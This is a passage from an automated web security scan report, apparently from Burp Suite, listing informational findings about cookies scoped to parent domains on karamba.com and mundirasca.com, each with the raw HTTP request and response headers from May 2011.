User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.133. http://www.karamba.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:23 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 108541


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.134. http://www.karamba.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:50 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44945


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.135. http://www.karamba.com/click/Karamba.com/ENG/Home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /click/Karamba.com/ENG/Home/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/Karamba.com/ENG/Home/ HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:02 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.136. http://www.mundirasca.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37105


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.137. http://www.mundirasca.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37870


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.138. http://www.mundirasca.com/ContactUsChat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsChat.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.139. http://www.mundirasca.com/ContactUsFax.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsFax.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36318


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.140. http://www.mundirasca.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44029


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.141. http://www.mundirasca.com/ContactUsTel.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsTel.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36099


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.142. http://www.mundirasca.com/FAQ.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /FAQ.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FAQ.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 86724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.143. http://www.mundirasca.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38009


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.144. http://www.mundirasca.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36932


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.145. http://www.mundirasca.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: www.mundirasca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dvkvwu55wj1sbf3o2utk1m55; path=/; HttpOnly
Set-Cookie: CSI_17=EncryptedUniqueVisitorID=65E5179F214E218C7690B36C8457FF60&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=mundirasca.com; expires=Fri, 16-May-2031 11:41:38 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
